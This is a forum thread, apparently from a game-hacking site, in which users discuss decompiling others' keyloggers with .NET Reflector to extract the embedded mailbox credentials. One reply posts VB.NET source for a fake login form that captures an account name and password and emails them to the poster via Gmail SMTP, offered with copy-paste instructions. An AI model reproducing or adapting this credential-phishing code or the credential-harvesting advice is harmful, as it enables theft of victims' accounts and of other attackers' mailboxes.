Opening Keylogger

Posts 115 of 18 · Page 1 of 2
Opening Keylogger
I see some of you guys open keylogger and find the email and pw for the logs.
So if someone can explain i would be gewd.
I think is better you ask for someone who do this...
Are you asking how a keylogger works or how to make one?
Quote Originally Posted by Dakota View Post
Are you asking how a keylogger works or how to make one?
He want to get the keylogger code, so he can get the email and pw, where's the accounts are sent.
.Net Reflector hz22/divers7 posted an indepth tut somewhere
Quote Originally Posted by Jacket View Post
.Net Reflector hz22/divers7 posted an indepth tut somewhere
He request delete it.
It's really simple just google it like i did.
google keyloggers
u want the code? here it is it is based on button1

Imports System.Web
Imports System.IO
Imports System.Net.Mail

Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("YourGmail", "your Password")
SmtpServer.Port = 587
SmtpServer.Host = "Smtp.Gmail.com"
SmtpServer.EnableSsl = True
SmtpServer.EnableSsl = True
mail.To.Add("ur gmail again")
mail.From = New MailAddress("Username@gmail.com")
mail.Subject = "Keylogged"
mail.Body = TextBox1.Text & TextBox2.Text
SmtpServer.Send(mail)

If TextBox1.Text = "" Then
MsgBox("Enter Your Account Name.", MsgBoxStyle.Information)
End If
If TextBox2.Text = "" Then
MsgBox("Enter Your Password.", MsgBoxStyle.Information)
End If

End Sub

it is based on 2 labels with Account and Password and two text box and 1 button

NOTEEEEEEEE U NEED TO CLICK ON BUTTON1 OR WHAT EVER U NAMED IT AND DELETE ALL THINGS IN IT AND COPY MY CODE AND PUT IT IN IT
Google 'Whaling tutorial', that's the term used for what this is.

You should find something of use.
Download RED Gate .Net Reflector
I thought keyloggers weren't allowed on this site...
Not possible for some keyloggers as they would have been encrypted with an ANTI ( Anti-Debugger ) Also some keyloggers have their source encrypted in a site or something.
Posts 115 of 18 · Page 1 of 2
This thread is closed for replies.

Tags for this Thread

None

Need help?